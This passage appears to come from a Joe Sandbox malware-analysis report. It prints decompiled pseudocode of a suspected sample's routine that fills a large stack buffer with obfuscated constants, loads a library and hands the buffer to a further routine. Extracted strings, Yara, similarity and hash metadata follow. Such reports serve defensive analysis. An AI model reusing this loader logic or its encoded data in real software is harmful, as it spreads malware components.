                  				intOrPtr _v404;
                  				intOrPtr _v408;
                  				intOrPtr _v412;
                  				intOrPtr _v416;
                  				intOrPtr _v420;
                  				intOrPtr _v424;
                  				intOrPtr _v428;
                  				intOrPtr _v432;
                  				intOrPtr _v436;
                  				intOrPtr _v440;
                  				intOrPtr _v444;
                  				intOrPtr _v448;
                  				intOrPtr _v452;
                  				intOrPtr _v456;
                  				intOrPtr _v460;
                  				intOrPtr _v464;
                  				intOrPtr _v468;
                  				intOrPtr _v472;
                  				intOrPtr _v476;
                  				intOrPtr _v480;
                  				intOrPtr _v484;
                  				intOrPtr _v488;
                  				intOrPtr _v492;
                  				intOrPtr _v496;
                  				intOrPtr _v500;
                  				intOrPtr _v504;
                  				intOrPtr _v508;
                  				intOrPtr _v512;
                  				intOrPtr _v516;
                  				intOrPtr _v520;
                  				intOrPtr _v524;
                  				intOrPtr _v528;
                  				intOrPtr _v532;
                  				intOrPtr _v536;
                  				intOrPtr _v540;
                  				intOrPtr _v544;
                  				intOrPtr _v548;
                  				intOrPtr _v552;
                  				intOrPtr _v556;
                  				intOrPtr _v560;
                  				intOrPtr _v564;
                  				intOrPtr _v568;
                  				intOrPtr _v572;
                  				intOrPtr _v576;
                  				intOrPtr _v580;
                  				intOrPtr _v584;
                  				intOrPtr _v588;
                  				intOrPtr _v592;
                  				intOrPtr _v596;
                  				intOrPtr _v600;
                  				intOrPtr _v604;
                  				intOrPtr _v608;
                  				intOrPtr _v612;
                  				intOrPtr _v616;
                  				intOrPtr _v620;
                  				intOrPtr _v624;
                  				intOrPtr _v628;
                  				intOrPtr _v632;
                  				intOrPtr _v636;
                  				intOrPtr _v640;
                  				intOrPtr _v644;
                  				intOrPtr _v648;
                  				intOrPtr _v652;
                  				intOrPtr _v656;
                  				intOrPtr _v660;
                  				intOrPtr _v664;
                  				intOrPtr _v668;
                  				intOrPtr _v672;
                  				intOrPtr _v676;
                  				intOrPtr _v680;
                  				intOrPtr _v684;
                  				intOrPtr _v688;
                  				intOrPtr _v692;
                  				intOrPtr _v696;
                  				intOrPtr _v700;
                  				intOrPtr _v704;
                  				intOrPtr _v708;
                  				intOrPtr _v712;
                  				intOrPtr _v716;
                  				intOrPtr _v720;
                  				intOrPtr _v724;
                  				intOrPtr _v728;
                  				intOrPtr _v732;
                  				intOrPtr _v736;
                  				intOrPtr _v740;
                  				intOrPtr _v744;
                  				intOrPtr _v748;
                  				intOrPtr _v752;
                  				intOrPtr _v756;
                  				intOrPtr _v760;
                  				intOrPtr _v764;
                  				intOrPtr _v768;
                  				intOrPtr _v772;
                  				intOrPtr _v776;
                  				intOrPtr _v780;
                  				intOrPtr _v784;
                  				intOrPtr _v788;
                  				intOrPtr _v792;
                  				intOrPtr _v796;
                  				intOrPtr _v800;
                  				intOrPtr _v804;
                  				intOrPtr _v808;
                  				intOrPtr _v812;
                  				intOrPtr _v816;
                  				intOrPtr _v820;
                  				intOrPtr _v824;
                  				intOrPtr _v828;
                  				intOrPtr _v832;
                  				intOrPtr _v836;
                  				intOrPtr _v840;
                  				intOrPtr _v844;
                  				intOrPtr _v848;
                  				intOrPtr _v852;
                  				intOrPtr _v856;
                  				intOrPtr _v860;
                  				intOrPtr _v864;
                  				intOrPtr _v868;
                  				intOrPtr _v872;
                  				intOrPtr _v876;
                  				intOrPtr _v880;
                  				intOrPtr _v884;
                  				intOrPtr _v888;
                  				intOrPtr _v892;
                  				intOrPtr _v896;
                  				intOrPtr _v900;
                  				intOrPtr _v904;
                  				intOrPtr _v908;
                  				intOrPtr _v912;
                  				intOrPtr _v916;
                  				intOrPtr _v920;
                  				intOrPtr _v924;
                  				intOrPtr _v928;
                  				intOrPtr _v932;
                  				intOrPtr _v936;
                  				intOrPtr _v940;
                  				intOrPtr _v944;
                  				intOrPtr _v948;
                  				intOrPtr _v952;
                  				intOrPtr _v956;
                  				intOrPtr _v960;
                  				intOrPtr _v964;
                  				intOrPtr _v968;
                  				intOrPtr _v972;
                  				intOrPtr _v976;
                  				intOrPtr _v980;
                  				intOrPtr _v984;
                  				intOrPtr _v988;
                  				intOrPtr _v992;
                  				intOrPtr _v996;
                  				intOrPtr _v1000;
                  				intOrPtr _v1004;
                  				intOrPtr _v1008;
                  				intOrPtr _v1012;
                  				intOrPtr _v1016;
                  				intOrPtr _v1020;
                  				intOrPtr _v1024;
                  				intOrPtr _v1028;
                  				intOrPtr _v1032;
                  				intOrPtr _v1036;
                  				intOrPtr _v1040;
                  				intOrPtr _v1044;
                  				intOrPtr _v1048;
                  				intOrPtr _v1052;
                  				intOrPtr _v1056;
                  				intOrPtr _v1060;
                  				intOrPtr _v1064;
                  				intOrPtr _v1068;
                  				intOrPtr _v1072;
                  				intOrPtr _v1076;
                  				intOrPtr _v1080;
                  				intOrPtr _v1084;
                  				intOrPtr _v1088;
                  				intOrPtr _v1092;
                  				intOrPtr _v1096;
                  				intOrPtr _v1100;
                  				intOrPtr _v1104;
                  				intOrPtr _v1108;
                  				intOrPtr _v1112;
                  				intOrPtr _v1116;
                  				intOrPtr _v1120;
                  				intOrPtr _v1124;
                  				intOrPtr _v1128;
                  				intOrPtr _v1132;
                  				intOrPtr _v1136;
                  				intOrPtr _v1140;
                  				intOrPtr _v1144;
                  				intOrPtr _v1148;
                  				intOrPtr _v1152;
                  				intOrPtr _v1156;
                  				intOrPtr _v1160;
                  				intOrPtr _v1164;
                  				intOrPtr _v1168;
                  				intOrPtr _v1172;
                  				intOrPtr _v1176;
                  				intOrPtr _v1180;
                  				intOrPtr _v1184;
                  				intOrPtr _v1188;
                  				intOrPtr _v1192;
                  				intOrPtr _v1196;
                  				intOrPtr _v1200;
                  				intOrPtr _v1204;
                  				intOrPtr _v1208;
                  				intOrPtr _v1212;
                  				intOrPtr _v1216;
                  				intOrPtr _v1220;
                  				intOrPtr _v1224;
                  				intOrPtr _v1228;
                  				intOrPtr _v1232;
                  				intOrPtr _v1236;
                  				intOrPtr _v1240;
                  				intOrPtr _v1244;
                  				intOrPtr _v1248;
                  				intOrPtr _v1252;
                  				intOrPtr _v1256;
                  				intOrPtr _v1260;
                  				intOrPtr _v1264;
                  				intOrPtr _v1268;
                  				intOrPtr _v1272;
                  				intOrPtr _v1276;
                  				intOrPtr _v1280;
                  				intOrPtr _v1284;
                  				intOrPtr _v1288;
                  				intOrPtr _v1292;
                  				intOrPtr _v1296;
                  				intOrPtr _v1300;
                  				intOrPtr _v1304;
                  				intOrPtr _v1308;
                  				intOrPtr _v1312;
                  				intOrPtr _v1316;
                  				intOrPtr _v1320;
                  				intOrPtr _v1324;
                  				intOrPtr _v1328;
                  				intOrPtr _v1332;
                  				intOrPtr _v1336;
                  				intOrPtr _v1340;
                  				intOrPtr _v1344;
                  				intOrPtr _v1348;
                  				intOrPtr _v1352;
                  				intOrPtr _v1356;
                  				intOrPtr _v1360;
                  				intOrPtr _v1364;
                  				intOrPtr _v1368;
                  				intOrPtr _v1372;
                  				intOrPtr _v1376;
                  				intOrPtr _v1380;
                  				intOrPtr _v1384;
                  				intOrPtr _v1388;
                  				intOrPtr _v1392;
                  				intOrPtr _v1396;
                  				intOrPtr _v1400;
                  				intOrPtr _v1404;
                  				intOrPtr _v1408;
                  				intOrPtr _v1412;
                  				intOrPtr _v1416;
                  				intOrPtr _v1420;
                  				intOrPtr _v1424;
                  				intOrPtr _v1428;
                  				intOrPtr _v1432;
                  				intOrPtr _v1436;
                  				intOrPtr _v1440;
                  				intOrPtr _v1444;
                  				intOrPtr _v1448;
                  				intOrPtr _v1452;
                  				intOrPtr _v1456;
                  				intOrPtr _v1460;
                  				intOrPtr _v1464;
                  				intOrPtr _v1468;
                  				intOrPtr _v1472;
                  				intOrPtr _v1476;
                  				intOrPtr _v1480;
                  				intOrPtr _v1484;
                  				intOrPtr _v1488;
                  				intOrPtr _v1492;
                  				intOrPtr _v1496;
                  				intOrPtr _v1500;
                  				intOrPtr _v1504;
                  				intOrPtr _v1508;
                  				intOrPtr _v1512;
                  				intOrPtr _v1516;
                  				intOrPtr _v1520;
                  				intOrPtr _v1524;
                  				intOrPtr _v1528;
                  				intOrPtr _v1532;
                  				intOrPtr _v1536;
                  				intOrPtr _v1540;
                  				intOrPtr _v1544;
                  				intOrPtr _v1548;
                  				intOrPtr _v1552;
                  				intOrPtr _v1556;
                  				intOrPtr _v1560;
                  				intOrPtr _v1564;
                  				intOrPtr _v1568;
                  				intOrPtr _v1572;
                  				intOrPtr _v1576;
                  				intOrPtr _v1580;
                  				intOrPtr _v1584;
                  				intOrPtr _v1588;
                  				intOrPtr _v1592;
                  				intOrPtr _v1596;
                  				intOrPtr _v1600;
                  				intOrPtr _v1604;
                  				intOrPtr _v1608;
                  				intOrPtr _v1612;
                  				intOrPtr _v1616;
                  				intOrPtr _v1620;
                  				intOrPtr _v1624;
                  				intOrPtr _v1628;
                  				intOrPtr _v1632;
                  				intOrPtr _v1636;
                  				intOrPtr _v1640;
                  				intOrPtr _v1644;
                  				intOrPtr _v1648;
                  				intOrPtr _v1652;
                  				intOrPtr _v1656;
                  				intOrPtr _v1660;
                  				intOrPtr _v1664;
                  				intOrPtr _v1668;
                  				intOrPtr _v1672;
                  				intOrPtr _v1676;
                  				intOrPtr _v1680;
                  				intOrPtr _v1684;
                  				intOrPtr _v1688;
                  				intOrPtr _v1692;
                  				intOrPtr _v1696;
                  				intOrPtr _v1700;
                  				intOrPtr _v1704;
                  				intOrPtr _v1708;
                  				intOrPtr _v1712;
                  				intOrPtr _v1716;
                  				intOrPtr _v1720;
                  				intOrPtr _v1724;
                  				intOrPtr _v1728;
                  				intOrPtr _v1732;
                  				intOrPtr _v1736;
                  				intOrPtr _v1740;
                  				intOrPtr _v1744;
                  				intOrPtr _v1748;
                  				intOrPtr _v1752;
                  				intOrPtr _v1756;
                  				intOrPtr _v1760;
                  				intOrPtr _v1764;
                  				intOrPtr _v1768;
                  				intOrPtr _v1772;
                  				intOrPtr _v1776;
                  				intOrPtr _v1780;
                  				intOrPtr _v1784;
                  				intOrPtr _v1788;
                  				intOrPtr _v1792;
                  				intOrPtr _v1796;
                  				intOrPtr _v1800;
                  				intOrPtr _v1804;
                  				intOrPtr _v1808;
                  				intOrPtr _v1812;
                  				intOrPtr _v1816;
                  				intOrPtr _v1820;
                  				intOrPtr _v1824;
                  				intOrPtr _v1828;
                  				intOrPtr _v1832;
                  				intOrPtr _v1836;
                  				intOrPtr _v1840;
                  				intOrPtr _v1844;
                  				intOrPtr _v1848;
                  				intOrPtr _v1852;
                  				intOrPtr _v1856;
                  				intOrPtr _v1860;
                  				intOrPtr _v1864;
                  				intOrPtr _v1868;
                  				intOrPtr _v1872;
                  				intOrPtr _v1876;
                  				intOrPtr _v1880;
                  				intOrPtr _v1884;
                  				char _v1888;
                  
                  				_v1888 = 0xa41c4ed0;
                  				_v1884 = 0x1a33c848;
                  				_v1880 = 0xf78674dd;
                  				_v1876 = 0x4d35aed;
                  				_v1872 = 0x5597c7b0;
                  				_v1868 = 0xb0ef52b0;
                  				_v1864 = 0x9b5bf2a7;
                  				_v1860 = 0xbf81a217;
                  				_v1856 = 0x3adcb09b;
                  				_v1852 = 0xe8ac849c;
                  				_v1848 = 0x57b96c20;
                  				_v1844 = 0xcd9f7235;
                  				_v1840 = 0xf420170d;
                  				_v1836 = 0x14cdf27a;
                  				_v1832 = 0xfd5eb0fb;
                  				_v1828 = 0x39318b65;
                  				_v1824 = 0x65d03115;
                  				_v1820 = 0x95260aff;
                  				_v1816 = 0x2e67c28e;
                  				_v1812 = 0xa1f4a8f4;
                  				_v1808 = 0xc812f1ab;
                  				_v1804 = 0xd934dc9c;
                  				_v1800 = 0xa4e6685;
                  				_v1796 = 0xfe213c23;
                  				_v1792 = 0x43c6d29;
                  				_v1788 = 0xcf12bcb8;
                  				_v1784 = 0x9f98cc3;
                  				_v1780 = 0xa1b2d167;
                  				_v1776 = 0x7fad3c40;
                  				_v1772 = 0xa80d3c34;
                  				_v1768 = 0xc8f714d7;
                  				_v1764 = 0x671d7785;
                  				_v1760 = 0x4a0ac7c8;
                  				_v1756 = 0x21c03928;
                  				_v1752 = 0x4555c0d0;
                  				_v1748 = 0x9834af68;
                  				_v1744 = 0xc6d9895d;
                  				_v1740 = 0xda921464;
                  				_v1736 = 0x6b089d64;
                  				_v1732 = 0xfec570b;
                  				_v1728 = 0xc3626a82;
                  				_v1724 = 0xd34a14be;
                  				_v1720 = 0xb7eabcaf;
                  				_v1716 = 0x281b3387;
                  				_v1712 = 0xcabf350d;
                  				_v1708 = 0x207d4223;
                  				_v1704 = 0xbc0cb804;
                  				_v1700 = 0xdefac10b;
                  				_v1696 = 0x679df176;
                  				_v1692 = 0x6390c0b9;
                  				_v1688 = 0x817bdef2;
                  				_v1684 = 0xcb119739;
                  				_v1680 = 0xd62a3fcf;
                  				_v1676 = 0x5b6539ee;
                  				_v1672 = 0x2ebc383e;
                  				_v1668 = 0xf6595eaa;
                  				_v1664 = 0xe1fa3158;
                  				_v1660 = 0xd81c642d;
                  				_v1656 = 0x5b3ff5b2;
                  				_v1652 = 0x25dcb5f4;
                  				_v1648 = 0xb74a4541;
                  				_v1644 = 0x65280c6a;
                  				_v1640 = 0x507410e2;
                  				_v1636 = 0x162eb7ae;
                  				_v1632 = 0x983fe17e;
                  				_v1628 = 0x1dce09e5;
                  				_v1624 = 0x20a01932;
                  				_v1620 = 0xf8c2ec13;
                  				_v1616 = 0xd03324ad;
                  				_v1612 = 0xdda4a81a;
                  				_v1608 = 0xefe7666e;
                  				_v1604 = 0x3499fe41;
                  				_v1600 = 0xfef05481;
                  				_v1596 = 0x4379be19;
                  				_v1592 = 0xac2a8a8c;
                  				_v1588 = 0xaa65ea73;
                  				_v1584 = 0x780f71c2;
                  				_v1580 = 0xbc7e1592;
                  				_v1576 = 0xb46dbbf2;
                  				_v1572 = 0x7f4481aa;
                  				_v1568 = 0x4c400fc5;
                  				_v1564 = 0xd0e27c84;
                  				_v1560 = 0xa0e4f48d;
                  				_v1556 = 0x608f4f65;
                  				_v1552 = 0x81e08196;
                  				_v1548 = 0x12e25f1;
                  				_v1544 = 0x108b753a;
                  				_v1540 = 0x734d6144;
                  				_v1536 = 0x2099d367;
                  				_v1532 = 0x4af859b5;
                  				_v1528 = 0x64274aa4;
                  				_v1524 = 0xd77c3180;
                  				_v1520 = 0xd07c56cd;
                  				_v1516 = 0x63b940a8;
                  				_v1512 = 0xdefbc07f;
                  				_v1508 = 0x1ed0b183;
                  				_v1504 = 0x946279a2;
                  				_v1500 = 0x1b4e182;
                  				_v1496 = 0xbd9e9d5e;
                  				_v1492 = 0xf895b090;
                  				_v1488 = 0x83ef7189;
                  				_v1484 = 0xdb6fdda0;
                  				_v1480 = 0xc43f2288;
                  				_v1476 = 0xfa2ee974;
                  				_v1472 = 0xad630715;
                  				_v1468 = 0x6e3f94ea;
                  				_v1464 = 0xc210224a;
                  				_v1460 = 0x5e42620a;
                  				_v1456 = 0xbdc03864;
                  				_v1452 = 0xfa898059;
                  				_v1448 = 0x5b223206;
                  				_v1444 = 0xe6ee380f;
                  				_v1440 = 0xe9c024a5;
                  				_v1436 = 0x795a214e;
                  				_v1432 = 0xf661e49b;
                  				_v1428 = 0x5d53c5b6;
                  				_v1424 = 0xe92e65b3;
                  				_v1420 = 0xe7f485b4;
                  				_v1416 = 0xe34b82e0;
                  				_v1412 = 0xaac6e570;
                  				_v1408 = 0xd3519085;
                  				_v1404 = 0x9d031edf;
                  				_v1400 = 0x16517768;
                  				_v1396 = 0x6b60337c;
                  				_v1392 = 0x87f162f5;
                  				_v1388 = 0x30b72081;
                  				_v1384 = 0xaf9664d7;
                  				_v1380 = 0xd1c1388f;
                  				_v1376 = 0xbaeca29b;
                  				_v1372 = 0x2614ddd9;
                  				_v1368 = 0xfd4ce0b1;
                  				_v1364 = 0x5c9c68b7;
                  				_v1360 = 0x2676eff1;
                  				_v1356 = 0x3d50e3a3;
                  				_v1352 = 0x53c809b1;
                  				_v1348 = 0x2d212e3b;
                  				_v1344 = 0x84a1010a;
                  				_v1340 = 0xafe995ff;
                  				_v1336 = 0x624ecd4e;
                  				_v1332 = 0xa0b9de9d;
                  				_v1328 = 0xf70d11ba;
                  				_v1324 = 0xe13ac65e;
                  				_v1320 = 0x94330fb1;
                  				_v1316 = 0x4ba9883c;
                  				_v1312 = 0xf9b4aa94;
                  				_v1308 = 0x1528153;
                  				_v1304 = 0xab11f915;
                  				_v1300 = 0xf65a3f7d;
                  				_v1296 = 0xf416523f;
                  				_v1292 = 0x622e2452;
                  				_v1288 = 0xe7dd6fea;
                  				_v1284 = 0xc53292c3;
                  				_v1280 = 0x341cfd;
                  				_v1276 = 0x1bf5cfa4;
                  				_v1272 = 0x3d6d8fc5;
                  				_v1268 = 0x882e2a5d;
                  				_v1264 = 0xf4dab66;
                  				_v1260 = 0x879777e1;
                  				_v1256 = 0x4235fa33;
                  				_v1252 = 0xf7412f63;
                  				_v1248 = 0x744366b8;
                  				_v1244 = 0x5d79780f;
                  				_v1240 = 0x33df1776;
                  				_v1236 = 0xa6b205d3;
                  				_v1232 = 0x7f6a7839;
                  				_v1228 = 0x671dbdce;
                  				_v1224 = 0xedb53a4e;
                  				_v1220 = 0x7885bf0f;
                  				_v1216 = 0x5d5e08dc;
                  				_v1212 = 0xe0da0cb9;
                  				_v1208 = 0x72626c3b;
                  				_v1204 = 0xf7523beb;
                  				_v1200 = 0xd3cbf7c0;
                  				_v1196 = 0xf397c375;
                  				_v1192 = 0xe8e0e8b8;
                  				_v1188 = 0xda2713ea;
                  				_v1184 = 0x61e812b;
                  				_v1180 = 0x1f5e76ae;
                  				_v1176 = 0xfcc0fd26;
                  				_v1172 = 0xa4f96784;
                  				_v1168 = 0xdfc74366;
                  				_v1164 = 0x4770325;
                  				_v1160 = 0xfcfb039;
                  				_v1156 = 0xbb5cd5be;
                  				_v1152 = 0x835bb17f;
                  				_v1148 = 0x45f03008;
                  				_v1144 = 0x8157471b;
                  				_v1140 = 0x92daa034;
                  				_v1136 = 0xc4415ba2;
                  				_v1132 = 0x1b6c5a77;
                  				_v1128 = 0x7e366518;
                  				_v1124 = 0x83ab0c1d;
                  				_v1120 = 0x397b67c4;
                  				_v1116 = 0xbf8a7d;
                  				_v1112 = 0x2e52b5be;
                  				_v1108 = 0x4c915e05;
                  				_v1104 = 0x3753c1d6;
                  				_v1100 = 0x95d39f06;
                  				_v1096 = 0x3d258823;
                  				_v1092 = 0x3608b8f8;
                  				_v1088 = 0xb4fbe8a7;
                  				_v1084 = 0x4c3e8f06;
                  				_v1080 = 0xe8794991;
                  				_v1076 = 0xdccaeb41;
                  				_v1072 = 0x9e236e45;
                  				_v1068 = 0xc17af71c;
                  				_v1064 = 0x4e7519a6;
                  				_v1060 = 0xc27014cc;
                  				_v1056 = 0x4d83d065;
                  				_v1052 = 0x6af34f37;
                  				_v1048 = 0xcd08d804;
                  				_v1044 = 0x3d730bc7;
                  				_v1040 = 0x21e8c57d;
                  				_v1036 = 0x317420d4;
                  				_v1032 = 0x6ebcf6dd;
                  				_v1028 = 0x7247c452;
                  				_v1024 = 0x690e32a5;
                  				_v1020 = 0x265b9d09;
                  				_v1016 = 0xef460e82;
                  				_v1012 = 0xbd38bc0;
                  				_v1008 = 0xce8b0c3b;
                  				_v1004 = 0x87b18560;
                  				_v1000 = 0x923ada08;
                  				_v996 = 0x7954f0df;
                  				_v992 = 0x59d4296d;
                  				_v988 = 0x598866b0;
                  				_v984 = 0x5ebed584;
                  				_v980 = 0x75f303ed;
                  				_v976 = 0x4bd185df;
                  				_v972 = 0x90668e75;
                  				_v968 = 0xef0ec6ee;
                  				_v964 = 0xfb160c3c;
                  				_v960 = 0xdddf860c;
                  				_v956 = 0xe3ec7c97;
                  				_v952 = 0xd84fe87a;
                  				_v948 = 0x4eebf6de;
                  				_v944 = 0x6598361e;
                  				_v940 = 0x2d4f37a9;
                  				_v936 = 0x20c189e8;
                  				_v932 = 0x1da649ac;
                  				_v928 = 0xbb2d17b0;
                  				_v924 = 0x7365b2a6;
                  				_v920 = 0x748039dd;
                  				_v916 = 0x40abf8ad;
                  				_v912 = 0xc2230aa3;
                  				_v908 = 0xddc9542f;
                  				_v904 = 0xd5cbbac;
                  				_v900 = 0x44de193b;
                  				_v896 = 0xe51fd5ad;
                  				_v892 = 0xf9739bdf;
                  				_v888 = 0xf511941f;
                  				_v884 = 0xbb4c8f97;
                  				_v880 = 0x71f29f4a;
                  				_v876 = 0xf93e7335;
                  				_v872 = 0xb3d5a235;
                  				_v868 = 0x8bf5639b;
                  				_v864 = 0xb678715c;
                  				_v860 = 0x1681d985;
                  				_v856 = 0xce6e3dde;
                  				_v852 = 0x5962f64c;
                  				_v848 = 0x1b0fea51;
                  				_v844 = 0xf304da7f;
                  				_v840 = 0x60dd60fc;
                  				_v836 = 0x4894e820;
                  				_v832 = 0xd4c5e951;
                  				_v828 = 0xbc0c6801;
                  				_v824 = 0x1b410e8d;
                  				_v820 = 0x9d4beae1;
                  				_v816 = 0xb4470101;
                  				_v812 = 0xefc6595c;
                  				_v808 = 0x1942297a;
                  				_v804 = 0x452f53c1;
                  				_v800 = 0x60736a8a;
                  				_v796 = 0x1cb5c8c2;
                  				_v792 = 0xa3b92496;
                  				_v788 = 0x3604e2c0;
                  				_v784 = 0x7d04dd0b;
                  				_v780 = 0xf93943b2;
                  				_v776 = 0xa34c9da0;
                  				_v772 = 0x16093c22;
                  				_v768 = 0x6230157f;
                  				_v764 = 0xf80a9182;
                  				_v760 = 0x9d202d62;
                  				_v756 = 0x58881b4d;
                  				_v752 = 0x7261191d;
                  				_v748 = 0xee6a2a6f;
                  				_v744 = 0x8b6ed692;
                  				_v740 = 0xf4ad89c5;
                  				_v736 = 0x902f328c;
                  				_v732 = 0xdae187c2;
                  				_v728 = 0x84c69aaf;
                  				_v724 = 0x8b583ddc;
                  				_v720 = 0x3154736a;
                  				_v716 = 0xf0ba94f8;
                  				_v712 = 0x371d3c0;
                  				_v708 = 0x9490ef0f;
                  				_v704 = 0x2d449fdf;
                  				_v700 = 0xb6d886dd;
                  				_v696 = 0x34ac4b5b;
                  				_v692 = 0x4add82f5;
                  				_v688 = 0x5643055a;
                  				_v684 = 0xedb6a896;
                  				_v680 = 0xf3b73e97;
                  				_v676 = 0xcd8bf45d;
                  				_v672 = 0x93a0ea35;
                  				_v668 = 0xf51d7bfd;
                  				_v664 = 0xd083f728;
                  				_v660 = 0x5978c810;
                  				_v656 = 0xacfb548d;
                  				_v652 = 0x681791b;
                  				_v648 = 0xab7f89b7;
                  				_v644 = 0x4f840277;
                  				_v640 = 0x45cf5527;
                  				_v636 = 0xafbc6fa5;
                  				_v632 = 0x7709f48f;
                  				_v628 = 0x8685cbd3;
                  				_v624 = 0x39eebbf5;
                  				_v620 = 0x5d1c8064;
                  				_v616 = 0x20fe1dce;
                  				_v612 = 0x69db75cc;
                  				_v608 = 0x9b65dc5a;
                  				_v604 = 0x27934866;
                  				_v600 = 0xf19b8bb6;
                  				_v596 = 0x887f0721;
                  				_v592 = 0x679fda8;
                  				_v588 = 0x78284a0;
                  				_v584 = 0x265fdb89;
                  				_v580 = 0x73ed0821;
                  				_v576 = 0x7d12f58b;
                  				_v572 = 0xc29cc904;
                  				_v568 = 0xf8cd14ad;
                  				_v564 = 0x5a59d9e2;
                  				_v560 = 0xa4ddcf31;
                  				_v556 = 0x91ce662e;
                  				_v552 = 0xc476dab;
                  				_v548 = 0xe8647b34;
                  				_v544 = 0x7a59bdcd;
                  				_v540 = 0xff29671e;
                  				_v536 = 0x37ab0d4d;
                  				_v532 = 0x3b7b2c58;
                  				_v528 = 0xdaca9837;
                  				_v524 = 0x5d95c73f;
                  				_v520 = 0x8d2d8ef2;
                  				_v516 = 0xe3a7eb3d;
                  				_v512 = 0x93410f8b;
                  				_v508 = 0x40690df9;
                  				_v504 = 0x56050e5c;
                  				_v500 = 0xdf7e7ef6;
                  				_v496 = 0xe57bff2d;
                  				_v492 = 0x8053dea3;
                  				_v488 = 0xca387b31;
                  				_v484 = 0x32eccb66;
                  				_v480 = 0xafb3b6b8;
                  				_v476 = 0x8f23f2d6;
                  				_v472 = 0x5fd00aa;
                  				_v468 = 0x7ba3d053;
                  				_v464 = 0xbed15460;
                  				_v460 = 0x91a7f84b;
                  				_v456 = 0x509deafe;
                  				_v452 = 0x8be07147;
                  				_v448 = 0x2a1903f7;
                  				_v444 = 0x74e13ee;
                  				_v440 = 0x46703439;
                  				_v436 = 0xf34281b8;
                  				_v432 = 0x88689edc;
                  				_v428 = 0xae06c319;
                  				_v424 = 0x809e0f7;
                  				_v420 = 0x32e2a63c;
                  				_v416 = 0x351aba4e;
                  				_v412 = 0x6bda9779;
                  				_v408 = 0xff25d6b;
                  				_v404 = 0xf19e2b12;
                  				_v400 = 0xe09ee902;
                  				_v396 = 0x30162918;
                  				_v392 = 0xf554291d;
                  				_v388 = 0xd293bf0c;
                  				_v384 = 0xa5aaa34d;
                  				_v380 = 0x18af0b32;
                  				_v376 = 0x45d3b443;
                  				_v372 = 0x8a8542bb;
                  				_v368 = 0xb2938f72;
                  				_v364 = 0x375b0514;
                  				_v360 = 0xa0175b99;
                  				_v356 = 0xab05d150;
                  				_v352 = 0xb2ab1a30;
                  				_v348 = 0xe6d1d6f1;
                  				_v344 = 0x5bc1d28d;
                  				_v340 = 0x31ab7862;
                  				_v336 = 0xb32f6993;
                  				_v332 = 0x3bff57b5;
                  				_v328 = 0xf4362081;
                  				_v324 = 0xa41ea41;
                  				_v320 = 0xf5554d12;
                  				_v316 = 0xe74be567;
                  				_v312 = 0xdda94f36;
                  				_v308 = 0x9942b8d7;
                  				_v304 = 0xa73018e6;
                  				_v300 = 0x65aa1921;
                  				_v296 = 0xa0ad1bda;
                  				_v292 = 0xfa54f506;
                  				_v288 = 0x36d533d2;
                  				_v284 = 0x2a17a738;
                  				_v280 = 0x24a73c55;
                  				_v276 = 0x25c6e7c;
                  				_v272 = 0x792542e6;
                  				_v268 = 0x60fe3e84;
                  				_v264 = 0xe894fa28;
                  				_v260 = 0xa8c3bd02;
                  				_v256 = 0xdec79a5c;
                  				_v252 = 0xaeea5367;
                  				_v248 = 0x9618cdf9;
                  				_v244 = 0x4d53bb98;
                  				_v240 = 0xc82415fb;
                  				_v236 = 0x311045a0;
                  				_v232 = 0x435d92ea;
                  				_v228 = 0x64d81a20;
                  				_v224 = 0x1a745c98;
                  				_v220 = 0xbb1cacab;
                  				_v216 = 0xb68b62f7;
                  				_v212 = 0x2262a170;
                  				_v208 = 0x244f7cd;
                  				_v204 = 0x634247e8;
                  				_v200 = 0x8e6f29ce;
                  				_v196 = 0xc125d02b;
                  				_v192 = 0xe1fb1246;
                  				_v188 = 0x90ff749d;
                  				_v184 = 0x9d49b7a9;
                  				_v180 = 0x8ae4cd18;
                  				_v176 = 0xdc3b0e33;
                  				_v172 = 0x5357343f;
                  				_v168 = 0x9078d775;
                  				_v164 = 0x7cd42af4;
                  				_v160 = 0x85875278;
                  				_v156 = 0xe098b691;
                  				_v152 = 0xdd539cbf;
                  				_v148 = 0x7b6915e6;
                  				_v144 = 0xdfa72c20;
                  				_v140 = 0x15af0b24;
                  				_v136 = 0x1e90183d;
                  				_v132 = 0xae2521d9;
                  				_v128 = 0x132fe8d2;
                  				_v124 = 0x7628aa01;
                  				_v120 = 0xf98981af;
                  				_v116 = 0xdeee782f;
                  				_v112 = 0x7ff5b8f;
                  				_v108 = 0x3a7c246a;
                  				_v104 = 0x8c6af67;
                  				_v100 = 0x27178fff;
                  				_v96 = 0x40ce6aac;
                  				_v92 = 0xe05cdea;
                  				_v88 = 0x1a09cd63;
                  				_v84 = 0x4ab557a2;
                  				_v80 = 0x578e6083;
                  				_v76 = 0x73ab4d0a;
                  				_v72 = 0x4577df03;
                  				_v68 = 0x388ee30c;
                  				_v64 = 0xa6a001f8;
                  				_v60 = 0xa362abb;
                  				_v56 = 0x4c361001;
                  				_v52 = 0x52b9ecf;
                  				_v48 = 0xf779ca4b;
                  				_v44 = 0xf0d67399;
                  				_v40 = 0x26e6d555;
                  				_v36 = 0xda742f2c;
                  				_v32 = 0x945c9d84;
                  				_v28 = 0x85b2d426;
                  				_v24 = 0x3e9987ee;
                  				_v20 = 0x9c588149;
                  				_v16 = 0x5b70fee9;
                  				_v12 = 0x724f6ac9;
                  				_v8 = 0x3e06e993;
                  				_t482 = E00401A52(0x412320, 0x72fc3a35);
                  				 *0x4164ec = LoadLibraryW(_t473);
                  				L00401B09(_t482);
                  				_push(0x414710);
                  				_push(0x81c5b25);
                  				return E004012FF( *0x4164ec,  &_v1888, 0x1d7);
                  			}

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 004088E8
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: bB^$#B} $4{d$94pF$;.!-$;lbr$?4WS$AA$DaMs$N!Zy$R$.b$X,{;$gK$j$|:$jsT1$nf$o*j$|3`k$9e[$B%y$GBc
                  • API String ID: 1029625771-3166147023
                  • Opcode ID: dd96afa55d8e9e932a96e5fe82667a6c913e1731f0611b2d86c11fa43710962e
                  • Instruction ID: 7dcabeb444d3c38dde185443b52466955599dc9d20e08e1f97c3b9dafdfd80e0
                  • Opcode Fuzzy Hash: dd96afa55d8e9e932a96e5fe82667a6c913e1731f0611b2d86c11fa43710962e
